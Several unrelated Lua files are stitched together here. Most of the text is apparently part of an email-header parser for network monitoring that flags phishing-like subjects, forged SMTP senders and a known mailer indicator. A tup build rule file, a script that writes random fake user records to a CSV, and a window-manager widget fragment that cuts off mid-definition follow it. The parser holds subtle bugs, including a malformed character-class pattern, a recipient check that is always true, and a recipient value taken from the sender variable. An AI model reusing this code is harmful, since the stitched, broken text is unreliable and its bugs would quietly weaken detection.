return {{["key"] = "analysis.service", ["value"] = "base64 email attachment"}}
end
end,
["content-type"] =
function(header)
local meta, boundary = {}, nil
local parameters, rfc2231 = {}, {}
for x in string.gmatch(header, "%s*([^;]+)") do
table.insert(parameters, x)
end
for i,j in ipairs(parameters) do
if i == 1 then
table.insert(meta, {["key"] = "content", ["value"] = j})
else
local test
test = not options.parseQuoted.value and string.match(j, "^[Bb][Oo][Uu][Nn][Dd][Aa][Rr][Yy] ?= ?[\"']?([^\"']+)")
if test then
boundary = test
else
test = string.match(j, "^[Tt][Yy][Pp[Ee] ?= ?\"(.-)\"")
if test then
table.insert(meta, {["key"] = "content", ["value"] = test})
else
test = string.match(j, "^[Nn][Aa][Mm][Ee] ?= ?\"(.-)\"")
if test then
table.insert(meta, {["key"] = "action", ["value"] = "attach"})
local attachment, charset = rfc2047(test)
if attachment then
local dir, file, ext = nwll.extractPathElements(attachment)
if file then
table.insert(meta, {["key"] = "attachment", ["value"] = file, ["charset"] = charset})
end
if ext then
table.insert(meta, {["key"] = "extension", ["value"] = ext, ["charset"] = charset})
end
end
else
-- collect RFC2231 headers
if string.find(j, "^[Ff][Ii][Ll][Ee][Nn][Aa][Mm][Ee]%*") then
rfc2231.filename = rfc2231.filename or {}
local index = string.match(j, "^[Ff][Ii][Ll][Ee][Nn][Aa][Mm][Ee]%*(%d+)") or 0
local atom = string.match(j, "%*%d-%*?=(.*)")
atom = string.gsub(atom, '"', '')
rfc2231.filename[index+1] = atom
elseif string.find(j, "^[Nn][Aa][Mm][Ee]%*") then
rfc2231.name = rfc2231.name or {}
local index = string.match(j, "^[Nn][Aa][Mm][Ee]%*(%d+)") or 0
local atom = string.match(j, "%*%d-%*?=(.*)")
if atom then
atom = string.gsub(atom, '"', '')
rfc2231.name[index+1] = atom
end
end
end
end
end
end
end
for type, value in pairs(rfc2231) do
-- register RFC2231 headers
value = table.concat(value), nil
local charset, attachment = string.match(value, "^([^']-)'[^']-'(.*)")
attachment = attachment or value
table.insert(meta, {["key"] = "action", ["value"] = "attach"})
local dir, file, ext = nwll.extractPathElements(value)
if file then
table.insert(meta, {["key"] = "attachment", ["value"] = file, ["charset"] = charset})
end
if ext then
table.insert(meta, {["key"] = "extension", ["value"] = ext, ["charset"] = charset})
end
end
return meta, nil, boundary
end,
["date"] = 0, -- for identification purposes only, no extraction
["dkim-signature"] = 0, -- for identification purposes only, no extraction
["domainkey-signature"] = 0, -- for identification purposes only, no extraction
["envelope-to"] =
function(header)
local meta = extractAddresses(header, "dst")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendto"})
end
return meta
end,
["from"] =
function(header)
local meta = {}
local extra
local meta, envelopeOriginators = extractAddresses(header, "src")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendfrom"})
end
if envelopeOriginators then
extra = {["envelopeOriginators"] = envelopeOriginators}
end
return meta, extra
end,
["in-reply-to"] =
function(header)
local meta = {}
local extra
local meta, envelopeOriginators = extractAddresses(header, "src")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendfrom"})
end
if envelopeOriginators then
extra = {["envelopeOriginators"] = envelopeOriginators}
end
return meta, extra
end,
["keywords"] = 0, -- for identification purposes only, no extraction
["list-archive"] = 0, -- for identification purposes only, no extraction
["list-help"] = 0, -- for identification purposes only, no extraction
["list-owner"] = 0, -- for identification purposes only, no extraction
["list-subscribe"] = 0, -- for identification purposes only, no extraction
["list-unsubscribe"] = 0, -- for identification purposes only, no extraction
["message-id"] = 0, -- for identification purposes only, no extraction
["mime-version"] = 0, -- for identification purposes only, no extraction
["precedence"] = 0, -- for identification purposes only, no extraction
["received"] =
function(header)
local meta = {}
local MTAfrom = string.match(header, "^(.*)%s?by ") or header
local MTAby = string.match(header, "^.*by%s(.*)")
local preHELO, id, id_type, ptr, ptr_type, ip, ip_type, helo, helo_type
preHELO, helo = string.match(MTAfrom, "^(.*)[Hh][Ee][Ll][Oo]=([%w%.%-%_%:%[%]]+)")
if preHELO then
MTAfrom = preHELO
end
id = string.match(MTAfrom, "^%s-[Ff][Rr][Oo][Mm] +([%w%.%-%_%:%[%]]+)")
ptr = string.match(MTAfrom, "^[^(]+%(([%w%.%-%_%:]+)")
ip = string.match(MTAfrom, "^[^(]+%([^%[]-%[([%w%.%-%_%:]+)%]")
if id then
id, id_type = nwll.determineHostType(id)
if id and id_type then
table.insert(meta, {["key"] = id_type, ["value"] = id})
end
end
if ptr then
ptr, ptr_type = nwll.determineHostType(ptr)
if ptr and ptr_type then
table.insert(meta, {["key"] = ptr_type, ["value"] = ptr})
end
end
if ip then
ip, ip_type = nwll.determineHostType(ip)
if ip and ip_type then
table.insert(meta, {["key"] = ip_type, ["value"] = ip})
end
end
if helo then
helo, helo_type = nwll.determineHostType(helo)
if helo and helo_type then
table.insert(meta, {["key"] = helo_type, ["value"] = helo})
end
end
if id and id_type then
if ptr and ptr_type and id_type == ptr_type and id ~= ptr then
table.insert(meta, {["key"] = "analysis.service", ["value"] = "received header hostname mismatch"})
elseif ip and ip_type and id_type == ip_type and id ~= ip then
table.insert(meta, {["key"] = "analysis.service", ["value"] = "received header IP mismatch"})
end
end
if helo and helo_type then
if ptr and ptr_type and helo_type == ptr_type and helo ~= ptr then
table.insert(meta, {["key"] = "analysis.service", ["value"] = "received header hostname mismatch"})
elseif ip and ip_type and helo_type == ip_type and helo ~= ip then
table.insert(meta, {["key"] = "analysis.service", ["value"] = "received header IP mismatch"})
end
end
if MTAby then
local sender = string.match(MTAby, "^.*[Ee][Nn][Vv][Ee][Ll][Oo][Pp][Ee]%-[Ff][Rr][Oo][Mm]%s-<([^%>]+@[^%>]+)>")
if sender then
local key, charset = (options.registerEmailSrcDst.value and "email.src") or "email", nil
sender, charset = rfc2047(sender)
if sender then
table.insert(meta, {["key"] = key, ["value"] = sender, ["charset"] = charset})
end
end
local recipient = string.match(MTAby, "^.*[Ff][Oo][Rr]%s-<([^%>]+@[^%>]+)>")
if recipient then
local key, charset = (options.registerEmailSrcDst.value and "email.dst") or "email", nil
recipient, charset = rfc2047(sender)
if recipient then
table.insert(meta, {["key"] = key, ["value"] = recipient, ["charset"] = charset})
end
end
end
return meta
end,
["references"] = 0, -- for identification purposes only, no extraction
["reply-to"] =
function(header)
local meta = {}
local extra
local meta, envelopeOriginators = extractAddresses(header, "src")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendfrom"})
end
if envelopeOriginators then
extra = {["envelopeOriginators"] = envelopeOriginators}
end
return meta, extra
end,
["resent-bcc"] =
function(header)
local meta = extractAddresses(header, "dst")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendto"})
end
return meta
end,
["resent-cc"] =
function(header)
local meta = extractAddresses(header, "dst")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendto"})
end
return meta
end,
["resent-date"] = 0, -- for identification purposes only, no extraction
["resent-from"] =
function(header)
local meta = {}
local extra
local meta, envelopeOriginators = extractAddresses(header, "src")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendfrom"})
end
if envelopeOriginators then
extra = {["envelopeOriginators"] = envelopeOriginators}
end
return meta, extra
end,
["resent-message-id"] = 0, -- for identification purposes only, no extraction
["resent-sender"] =
function(header)
local meta = {}
local extra
local meta, envelopeOriginators = extractAddresses(header, "src")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendfrom"})
end
if envelopeOriginators then
extra = {["envelopeOriginators"] = envelopeOriginators}
end
return meta, extra
end,
["resent-to"] =
function(header)
local meta = extractAddresses(header, "dst")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendto"})
end
return meta
end,
["return-path"] =
function(header)
local meta = {}
local extra
local meta, envelopeOriginators = extractAddresses(header, "src")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendfrom"})
end
if envelopeOriginators then
extra = {["envelopeOriginators"] = envelopeOriginators}
end
return meta, extra
end,
["sender"] =
function(header)
local meta = {}
local extra
local meta, envelopeOriginators = extractAddresses(header, "src")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendfrom"})
end
if envelopeOriginators then
extra = {["envelopeOriginators"] = envelopeOriginators}
end
return meta, extra
end,
["subject"] =
function(header)
local meta = {}
local extra
local subject, charset = rfc2047(header)
if subject then
table.insert(meta, {["key"] = "subject", ["value"] = subject, ["charset"] = charset})
subject = string.lower(subject)
-- Only want to register these for inbound mail, but in this function we don't
-- know if it is inbound. So send it back as "extra" information.
if string.find(subject, "^re:") then
extra = {["sessionVars"] = {["re"] = true}}
elseif string.find(subject, "^fwd:") then
extra = {["sessionVars"] = {["fwd"] = true}}
else
-- only look for phishy subjects if not a Re: or Fwd:
for i, j in ipairs(phishySubjects) do
if string.find(subject, "^.*" .. j) then
extra = {["sessionVars"] = {["subject_phish"] = true}}
end
end
end
end
return meta, extra
end,
["thread-index"] = 0, -- for identification purposes only, no extraction
["to"] =
function(header)
local meta = extractAddresses(header, "dst")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendto"})
end
return meta
end,
["x-cloudmark"] = 0, -- for identification purposes only, no extraction
["x-mailer"] =
function(header)
local meta = {{["key"] = "client", ["value"] = header}}
if options.xmailer.value and options.xmailer.value ~= "client" then
table.insert(meta, {["key"] = options.xmailer.value, ["value"] = header})
end
if string.find(header, "^.*[Ee][Xx][Pp][Rr][Ee][Ss][Ss]") then
table.insert(meta, {["key"] = "analysis.service", ["value"] = "express x-mailer"})
end
if string.find(header, "^.*10%.40%.1836") then
table.insert(meta, {["key"] = "ioc", ["value"] = "Elderwood XMailer Artifact"})
end
return meta
end,
["x-original-authentication-results"] = 0, -- for identification purposes only, no extraction
["x-originating-ip"] =
function(header)
local meta = {}
for host in string.gmatch(header, "[^, ]+") do
local key
host, key = nwll.determineHostType(host)
if host and key then
table.insert(meta, {["key"] = key, ["value"] = host})
end
end
return meta
end,
})
function mailParser:headerTable(headersBegin, lastHeaderSeen, headersEnd)
if not lastHeaderSeen then
return
end
if not headersEnd then
local nPackets, nBytes, nPayloadBytes = nw.getStreamStats()
headersEnd = nPayloadBytes
end
-- want at most 1024 bytes from the last header token match
headersEnd = (headersEnd - lastHeaderSeen <= 1023 and headersEnd) or lastHeaderSeen + 1023
if headersEnd - headersBegin > 128000 then
-- that's still *way* too big to be a set of email headers
return
end
local payload = nw.getPayload(headersBegin, headersEnd)
local headers, unique = {}, 0
if payload then
-- convert the header block into a string
local headerBlock = payload:tostring()
payload = nil
-- construct a table of the individual headers and their values
local seen = {}
for line in string.gmatch(headerBlock, "[^\010^\013]+") do
if #line > 998 then
-- http://tools.ietf.org/html/rfc5322#section-2.1.1
-- if we hit a line that exceeds 998 characters it probably isn't an email
return nil
end
local headerType, headerValue = string.match(line, "^(%w[%w_%-]+)%s-:%s-(.*)%s-$")
if headerType and headerValue then
headerType = string.lower(headerType)
table.insert(headers, {["type"] = headerType, ["value"] = headerValue})
-- keep track of how many unique supported header types we see
if not seen[headerType] and mailFunctions[headerType] then
seen[headerType] = true
unique = unique + 1
end
elseif #headers > 0 and string.find(line, "^%s") then
headers[#headers]["value"] = headers[#headers]["value"] .. line
end
end
end
return headers, unique
end
function mailParser:sessionBegin()
self.sessionVars = {}
if self.direction then
self.sessionVars.direction = self.direction
self.direction = nil
end
end
function mailParser:streamBegin()
self.streamVars = {
-- ["mailHeadersBegin"],
-- ["contentHeadersBegin"],
-- ["mime"] = {
-- ["outer"]
-- ["outerMatched"]
-- ["inner"]
-- ["innerMatched"]
-- }
}
end
function mailParser:checkSrc()
if self.sessionVars then
if self.sessionVars.isMail and
self.sessionVars.orgSrc and
not self.sessionVars.re and
not self.sessionVars.fwd and
self.sessionVars.direction == "inbound"
then
local orgSrc = self.sessionVars.orgSrc
if orgSrc then
orgSrc = string.lower(orgSrc)
if not commonOrgSources[orgSrc] then
nw.createMeta(self.keys["analysis.service"], "uncommon mail source")
if self.sessionVars.subject_phish then
nw.createMeta(self.keys["analysis.service"], "subject phish")
end
end
end
end
end
end
function mailParser:direction(idx, vlu)
if version >= 11.3 then
self.sessionVars.direction = vlu
else
self.direction = vlu
end
end
function mailParser:callPhishing(messageEnd)
-- Should never get here if phishing is disabled, or don't have messageBegin, or haven't seen an href.
-- But check anyway...
if phishingModule and self.streamVars.messageBegin and self.streamVars.href then
messageEnd = messageEnd or -1
phishingModule.examine(self.streamVars.messageBegin, messageEnd)
end
self.streamVars.href = nil
self.streamVars.messageBegin = nil
end
function mailParser:mailHeader(token, first, last)
if not self.streamVars.mime or not self.streamVars.mime.outerMatched and not self.streamVars.contentHeadersBegin then
if not self.streamVars.mailHeadersBegin then
self.streamVars.mailHeadersBegin = first
self.streamVars.lastHeaderSeen = first
if self.streamVars.href then
-- href won't be true if don't have messageBegin, and won't have messageBegin if phishing is disabled
self:callPhishing(first - 1)
end
else
self.streamVars.lastHeaderSeen = first
end
end
end
function mailParser:contentHeader(token, first, last)
if self.streamVars.mailHeadersBegin then
self.streamVars.lastHeaderSeen = first
else
-- Only parse this separately if we've seen an outer mime boundary begin and not an inner mime boundary begin.
-- Note that if we haven't previously seen a valid block of mail headers, then we can't have seen a boundary.
if (options.parseQuoted.value or (self.streamVars.mime and self.streamVars.mime.outerMatched and not self.streamVars.mime.innerMatched)) and not self.streamVars.mailHeadersBegin then
if self.streamVars.contentHeadersBegin then
self.streamVars.lastHeaderSeen = first
else
self.streamVars.contentHeadersBegin = first
self.streamVars.lastHeaderSeen = first
if self.streamVars.href then
-- href won't be true if don't have messageBegin, and won't have messageBegin if phishing is disabled
self:callPhishing(first - 1)
end
end
end
end
end
function mailParser:href()
-- won't have messageBegin if phishing is disabled or if isn't an email
if self.streamVars.messageBegin then
self.streamVars.href = true
end
end
function mailParser:endOfHeaders(token, first, last)
if not (first and last) then
if self.streamVars.xid then
self.streamVars.xid:commit()
self.streamVars.xid = nil
end
if self.streamVars.href then
self:callPhishing()
end
end
if self.streamVars.mailHeadersBegin and self.streamVars.lastHeaderSeen and (self.streamVars.mailHeadersBegin ~= self.streamVars.lastHeaderSeen) then
local headers, unique = self:headerTable(self.streamVars.mailHeadersBegin, self.streamVars.lastHeaderSeen, (first and first - 1) or nil)
self.streamVars.mailHeadersBegin, self.streamVars.lastHeaderSeen = nil, nil
-- only parse a block of headers if we see at least 5 mail headers in that block
if headers and unique and unique >= 5 then
local xid
if transactions then
xid = self.streamVars.xid
if xid then
xid:commit()
self.streamVars.xid = nil
end
xid = mailParser:createTransaction()
self.streamVars.xid = xid
end
createMeta(xid, self.keys.content, "mail")
self.sessionVars.isMail = true
if self.sessionVars.direction == "inbound" then
createMeta(xid, self.keys["analysis.service"], "inbound email")
end
if phishingModule and last then
self.streamVars.messageBegin = last + 1
end
local state = {}
for idx, header in ipairs(headers) do
local headerType = (header.type and string.lower(header.type)) or nil
if headerType and header.value and mailFunctions[headerType] then
if headerType == "to" or headerType == "envelope-to" or "resent-to" then
state.sawTo = true
elseif headerType == "cc" or headerType == "bcc" then
state.sawCC = true
end
if mailFunctions[headerType] ~= 0 then
local meta, extra, boundary = mailFunctions[headerType](header.value)
if meta then
for metaNum, metaItem in ipairs(meta) do
if metaItem.key and metaItem.value then
createMeta(xid, self.keys[metaItem.key], metaItem.value, metaItem.charset)
end
end
end
if extra then
if extra.sessionVars then
for i,j in ipairs(extra.sessionVars) do
for key, value in pairs(j) do
self.sessionVars[key] = value
end
end
end
if extra.streamVars then
for i,j in ipairs(extra.streamVars) do
for key, value in pairs(j) do
self.streamVars[key] = value
end
end
end
if extra.envelopeOriginators then
state.envelopeOriginators = state.envelopeOriginators or {}
for origin_idx, origin_address in ipairs(extra.envelopeOriginators) do
state.envelopeOriginators[origin_address] = true
end
end
end
if boundary then
-- saw a boundary definition
self.streamVars.mime = self.streamVars.mime or {}
if not self.streamVars.mime.outer then
self.streamVars.mime.outer = "--" .. boundary
self.streamVars.mime.outerLength = #boundary
elseif self.streamVars.mime.outerMatched and not self.streamVars.mime.inner then
self.streamVars.mime.inner = "--" .. boundary
self.streamVars.mime.innerLength = #boundary
end
end
end
if options.customHeaders.value and options.customHeaders.value[headerType] then
createMeta(xid, self.keys[options.customHeaders.value[headerType]], header.value)
end
end
end
if not state.sawTo then
-- no TO: header
if state.sawCC then
createMeta(xid, self.keys["analysis.service"], "email recipients cc/bcc only")
else
-- no CC: header either
createMeta(xid, self.keys["analysis.service"], "email missing recipients")
end
end
if state.envelopeOriginators then
-- If SMTP then compare envelope sender with SMTP sender
if SMTP_lua == nil then
pcall(function()
SMTP_lua = require('SMTP_lua')
if not (SMTP_lua and type(SMTP_lua) == "table" and SMTP_lua.isSMTP) then
SMTP_lua = false
end
end)
end
if SMTP_lua then
if SMTP_lua.isSMTP() then
local smtpOriginator = SMTP_lua.getOriginator() or "unknown"
if not state.envelopeOriginators[smtpOriginator] then
createMeta(xid, self.keys["analysis.service"], "smtp forged sender")
end
end
end
end
end
end
if self.streamVars.contentHeadersBegin then
local headers, unique = self:headerTable(self.streamVars.contentHeadersBegin, self.streamVars.lastHeaderSeen, (first and first - 1) or nil)
self.streamVars.contentHeadersBegin, self.streamVars.lastHeaderSeen = nil, nil
if headers and unique and unique > 0 then
local xid
if transactions then
xid = self.streamVars.xid
if not xid then
xid = mailParser:createTransaction()
self.streamVars.xid = xid
end
end
for idx, header in ipairs(headers) do
local headerType = (header.type and string.lower(header.type)) or nil
if headerType and header.value and mailFunctions[headerType] and mailFunctions[headerType] ~= 0 then
local meta, extra, boundary = mailFunctions[headerType](header.value)
if meta then
for metaNum, metaItem in ipairs(meta) do
if metaItem.key and metaItem.value then
createMeta(xid, self.keys[metaItem.key], metaItem.value, metaItem.charset)
end
end
end
if extra then
if extra.sessionVars then
for i,j in ipairs(extra.sessionVars) do
for key, value in pairs(j) do
self.sessionVars[key] = value
end
end
end
if extra.streamVars then
for i,j in ipairs(extra.streamVars) do
for key, value in pairs(j) do
self.streamVars[key] = value
end
end
end
end
if boundary then
-- saw a boundary definitions
self.streamVars.mime = self.streamVars.mime or {}
if not self.streamVars.mime.outer then
self.streamVars.mime.outer = "--" .. boundary
self.streamVars.mime.outerLength = #boundary
elseif self.streamVars.mime.outerMatched and not self.streamVars.mime.inner then
self.streamVars.mime.inner = "--" .. boundary
self.streamVars.mime.innerLength = #boundary
end
end
end
if options.customHeaders.value and options.customHeaders.value[headerType] then
createMeta(xid, self.keys[options.customHeaders.value[headerType]], header.value)
end
end
end
end
-- Look for mime boundaries, unless:
--
-- If first or last are nil then we are at the end of stream so no longer
-- care about boundaries.
--
-- If self.streamVars.mime is nil then either options.parseQuoted is true, or
-- we haven't seen a boundary definition and so don't care about boundaries.
--
-- Per RFC, mime boundaries must be preceded by a double carriage-return/linefeed.
-- However this may not be adhered to by all MUA's. So if a boundary isn't seen
-- after a 0x0d0a0d0a, then look before it as well.
if self.streamVars.mime and (self.streamVars.mime.outer or self.streamVars.mime.inner) and first and last then
-- When an outer boundary begin is seen, only attachment headers are
-- extracted until the outer boundary termination is seen.
--
-- When an inner boundary begin is seen, no headers are extracted until
-- the inner boundary termination is seen - not even attachment headers.
local mime = self.streamVars.mime
if mime.outer then
-- saw outer definition
if mime.outerMatched then
-- saw outer begin
if mime.inner then
-- saw inner definition
if mime.innerMatched then
-- saw inner begin, so look for an inner termination
local payload = nw.getPayload(last + 1, last + mime.innerLength + 4)
-- first try looking for it after the 0x0d0a0d0a
if payload and payload:equal(mime.inner .. "--") then
-- inner terminated
self.streamVars.mime.innerMatched = false
self.streamVars.mime.inner = false
else
-- then try looking for it before the 0x0d0a0d0a
payload = nw.getPayload(first - mime.innerLength - 4, first - 1)
if payload and payload:equal(mime.inner .. "--") then
-- inner terminated
self.streamVars.mime.innerMatched = false
self.streamVars.mime.inner = false
end
end
else
-- haven't seen inner begin look for inner begin
local payload = nw.getPayload(last + 1, last + mime.innerLength + 2)
if payload and payload:equal(mime.inner) then
-- saw inner begin
self.streamVars.mime.innerMatched = true
else
-- not inner begin, look for outer termination
payload = nw.getPayload(last + 1, last + mime.outerLength + 4)
-- first try lookking for it after the 0x0d0a0d0a
if payload and payload:equal(mime.outer .. "--") then
-- outer terminated
self.streamVars.mime.outerMatched = false
self.streamVars.mime.outer = false
else
-- then try looking for it before the 0x0d0a0d0a
payload = nw.getPayload(first - mime.outerLength - 4, first - 1)
if payload and payload:equal(mime.outer .. "--") then
-- outer terminated
self.streamVars.mime.outerMatched = false
self.streamVars.mime.outer = false
end
end
end
end
else
-- haven't seen inner definition, so look for outer termination
local payload = nw.getPayload(last + 1, last + mime.outerLength + 4)
-- first try looking for it after the 0x0d0a0d0a
if payload and payload:equal(mime.outer .. "--") then
-- outer terminated
self.streamVars.mime.outerMatched = false
self.streamVars.mime.outer = false
else
-- then try looking for it before the 0x0d0a0d0a
payload = nw.getPayload(first - mime.outerLength - 4, first - 1)
if payload and payload:equal(mime.outer .. "--") then
-- outer terminated
self.streamVars.mime.outerMatched = false
self.streamVars.mime.outer = false
end
end
end
else
-- haven't seen outer begin, so look for outer begin
local payload = nw.getPayload(last + 1, last + mime.outerLength + 2)
if payload and payload:equal(mime.outer) then
-- saw outer begin
self.streamVars.mime.outerMatched = true
end
end
end
end
end
function mailParser:orgSrc(idx, vlu)
-- TODO use the new GeoIP API instead
if self.sessionVars then
self.sessionVars.orgSrc = vlu
if version < 11.3 then
self:checkSrc()
-- This callback occurs after session end, since we're here may as well do this too
self.sessionVars = nil
self.streamVars = nil
end
end
end
function mailParser:sessionEnd()
self:checkSrc()
end
local callbacks = {
-- initialize
[nwevents.OnSessionBegin] = mailParser.sessionBegin,
[nwevents.OnStreamBegin] = mailParser.streamBegin,
-- callbacks
[nwlanguagekey.create("direction")] = mailParser.direction, -- occurs before session begin
[nwlanguagekey.create("org.src")] = mailParser.orgSrc, -- occurs after session end
-- mail header tokens
["^Authentication-Results:"] = mailParser.mailHeader,
["^bcc:"] = mailParser.mailHeader,
["^Bcc:"] = mailParser.mailHeader,
["^BCC:"] = mailParser.mailHeader,
["^cc:"] = mailParser.mailHeader,
["^Cc:"] = mailParser.mailHeader,
["^CC:"] = mailParser.mailHeader,
["^comments:"] = mailParser.mailHeader,
["^Comments:"] = mailParser.mailHeader,
["^COMMENTS:"] = mailParser.mailHeader,
["^content-transfer-encoding:"] = mailParser.mailHeader,
["^Content-transfer-encoding:"] = mailParser.mailHeader,
["^Content-Transfer-Encoding:"] = mailParser.mailHeader,
["^CONTENT-TRANSFER-ENCODING:"] = mailParser.mailHeader,
["^date:"] = mailParser.mailHeader,
["^Date:"] = mailParser.mailHeader,
["^DATE:"] = mailParser.mailHeader,
["^DKIM-Signature:"] = mailParser.mailHeader,
["^DomainKey-Signature:"] = mailParser.mailHeader,
["^envelope-to:"] = mailParser.mailHeader,
["^Envelope-to:"] = mailParser.mailHeader,
["^Envelope-To:"] = mailParser.mailHeader,
["^ENVELOPE-TO:"] = mailParser.mailHeader,
["^from:"] = mailParser.mailHeader,
["^From:"] = mailParser.mailHeader,
["^FROM:"] = mailParser.mailHeader,
["^in-reply-to:"] = mailParser.mailHeader,
["^In-reply-to:"] = mailParser.mailHeader,
["^In-Reply-To:"] = mailParser.mailHeader,
["^IN-REPLY-TO:"] = mailParser.mailHeader,
["^keywords:"] = mailParser.mailHeader,
["^Keywords:"] = mailParser.mailHeader,
["^KEYWORDS:"] = mailParser.mailHeader,
["^List-Archive:"] = mailParser.mailHeader,
["^List-Help:"] = mailParser.mailHeader,
["^List-Owner:"] = mailParser.mailHeader,
["^List-Subscribe:"] = mailParser.mailHeader,
["^List-Unsubscribe:"] = mailParser.mailHeader,
["^message-id:"] = mailParser.mailHeader,
["^Message-Id:"] = mailParser.mailHeader,
["^Message-ID:"] = mailParser.mailHeader,
["^MESSAGE-ID:"] = mailParser.mailHeader,
["^mime-version:"] = mailParser.mailHeader,
["^Mime-version:"] = mailParser.mailHeader,
["^Mime-Version:"] = mailParser.mailHeader,
["^MIME-version:"] = mailParser.mailHeader,
["^MIME-VERSION:"] = mailParser.mailHeader,
["^precedence:"] = mailParser.mailHeader,
["^Precedence:"] = mailParser.mailHeader,
["^PRECEDENCE:"] = mailParser.mailHeader,
["^received:"] = mailParser.mailHeader,
["^Received:"] = mailParser.mailHeader,
["^RECEIVED:"] = mailParser.mailHeader,
["^references:"] = mailParser.mailHeader,
["^References:"] = mailParser.mailHeader,
["^REFERENCES:"] = mailParser.mailHeader,
["^reply-to:"] = mailParser.mailHeader,
["^Reply-to:"] = mailParser.mailHeader,
["^Reply-To:"] = mailParser.mailHeader,
["^REPLY-TO:"] = mailParser.mailHeader,
["^return-path:"] = mailParser.mailHeader,
["^Return-path:"] = mailParser.mailHeader,
["^Return-Path:"] = mailParser.mailHeader,
["^RETURN-PATH:"] = mailParser.mailHeader,
["^sender:"] = mailParser.mailHeader,
["^Sender:"] = mailParser.mailHeader,
["^SENDER:"] = mailParser.mailHeader,
["^subject:"] = mailParser.mailHeader,
["^Subject:"] = mailParser.mailHeader,
["^SUBJECT:"] = mailParser.mailHeader,
["^to:"] = mailParser.mailHeader,
["^To:"] = mailParser.mailHeader,
["^TO:"] = mailParser.mailHeader,
["^X-Cloudmark-"] = mailParser.mailHeader,
["^x-mailer:"] = mailParser.mailHeader,
["^X-mailer:"] = mailParser.mailHeader,
["^X-Mailer:"] = mailParser.mailHeader,
["^X-MAILER:"] = mailParser.mailHeader,
["^X-Original-Authentication-Results:"] = mailParser.mailHeader,
["^x-originating-ip:"] = mailParser.mailHeader,
["^X-originating-IP:"] = mailParser.mailHeader,
["^X-Originating-IP:"] = mailParser.mailHeader,
["^X-ORIGINATING-IP:"] = mailParser.mailHeader,
-- attachment tokens
["^content-disposition:"] = mailParser.contentHeader,
["^Content-disposition:"] = mailParser.contentHeader,
["^Content-Disposition:"] = mailParser.contentHeader,
["^CONTENT-DISPOSITION:"] = mailParser.contentHeader,
["^content-transfer-encoding:"] = mailParser.contentHeader,
["^Content-transfer-encoding:"] = mailParser.contentHeader,
["^Content-Transfer-Encoding:"] = mailParser.contentHeader,
["^CONTENT-TRANSFER-ENCODING:"] = mailParser.contentHeader,
["^content-type:"] = mailParser.contentHeader,
["^Content-type:"] = mailParser.contentHeader,
["^Content-Type:"] = mailParser.contentHeader,
["^CONTENT-TYPE:"] = mailParser.contentHeader,
-- phishing detection
["HREF"] = mailParser.href,
["Href"] = mailParser.href,
["href"] = mailParser.href,
-- register meta
["\013\010\013\010"] = mailParser.endOfHeaders,
["\013\010.\013\010"] = mailParser.endOfHeaders, -- SMTP end-of-message (failsafe)
[nwevents.OnStreamEnd] = mailParser.endOfHeaders,
}
if version >= 11.3 then
callbacks[nwevents.OnSessionEnd] = mailParser.sessionEnd
end
mailParser:setCallbacks(callbacks)
return summary |
local sources = {"src/Luvent.lua"}
local tests = {"tests/Luvent.spec.lua"}
tup.rule(sources, "^ Running Luacheck^ luacheck %f")
tup.rule(sources,
"^ Creating TAGS for Emacs^ ctags-exuberant --languages=lua -e %f",
{"TAGS"})
tup.rule(tests, [[^ Running Unit Tests^ busted --pattern=".spec.lua" %f]])
tup.rule(sources,
[[^ Generating Documentation^ ldoc --dir="docs/" %f]],
{"docs/index.html", "docs/ldoc.css"})
|
nomes = {"Suzana", "Marcos", "Rosana", "Roberto", "Tiago",
"Mateus", "Felipe", "Ana", "Almir", "Juliana", "Renata",
"Marcos", "Murilo", "Luciana", "Regina", "Jose", "Leandro",
"Julia", "Andre", "Camilla", "Maria", "Tereza", "Jonas", "Amadeu",
"Teodoro", "Sampaio", "Reginaldo", "Pedro", "Michele", "Rick",
"Annie"}
cores = {"azul", "roxo", "preto", "vermelho", "amarelo",
"laranja", "verde", "marrom", "cinza", "branco"
}
times = {"sao caetano", "sao paulo", "corinthians", "barcelona",
"real madrid", "manchester united", "cruzeiro", "brasil",
"palmeiras", "flamengo"
}
filmes = {"eu sou a lenda", "novica rebelde", "tomates verdes e fritos",
"kimi no na wa", "sonic", "rocketman", "era do gelo", "shrek",
"detetive pikachu", "paprika", "senhor dos aneis"
}
cidades = {"sao paulo", "sao carlos", "rio de janeiro", "manaus", "curitiba",
"salvador", "campinas", "riberao preto", "florianopolis", "rio branco"
}
file = io.open("adicao.csv","w+");
io.output(file)
if arg[1] == nil then
print("Digite um argumento... (numero de usuarios a serem gerados!)")
os.exit()
end
io.write("nome" .. "," .. "username" .. "," .. "pin" .. "," .. "idade" .. "," ..
"cidade" .. "," .. "filme" .. "," .. "time" .. "," .. "cor\n")
for i=0, arg[1] do
local nome = nomes[math.random(1,31)]
local username = "" .. string.lower(nome) .. tostring(i)
local pin = math.random(1000, 9999)
local idade = math.random(10,70)
local cidade = cidades[math.random(1,10)]
local filme = filmes[math.random(1,10)]
local time = times[math.random(1,10)]
local cor = cores[math.random(1,10)]
io.write(nome .. "," .. username .. "," .. pin .. "," .. idade ..
"," .. cidade .. "," .. filme .. "," .. time .. "," .. cor .. '\n')
end
io.close(file)
|
-- Standard awesome library
local awful = require("awful")
-- Theme handling library
local beautiful = require("beautiful")
local dpi = beautiful.xresources.apply_dpi
-- Widget library
local wibox = require("wibox")
-- Helpers
local helpers = require("helpers")
-- Todo
---------
local todo_text = wibox.widget{
font = beautiful.font_name .. "medium 8",
markup = helpers.colorize_text("Todo", beautiful.dashboard_box_fg),
valign = "center",
widget = wibox.widget.textbox
}
local todo_badge = wibox.widget{
font = beautiful.font_name .. "medium 8",
markup = helpers.colorize_text("0", beautiful.xcolor1),
valign = "center",
widget = wibox.widget.textbox
}
local todo_stat = wibox.widget{
colors = {beautiful.xcolor8},
bg = "#1C252C",
value = 5,
min_value = 0,
max_value = 8,
thickness = dpi(8),
rounded_edge = true,
start_angle = math.pi * 3 / 2,
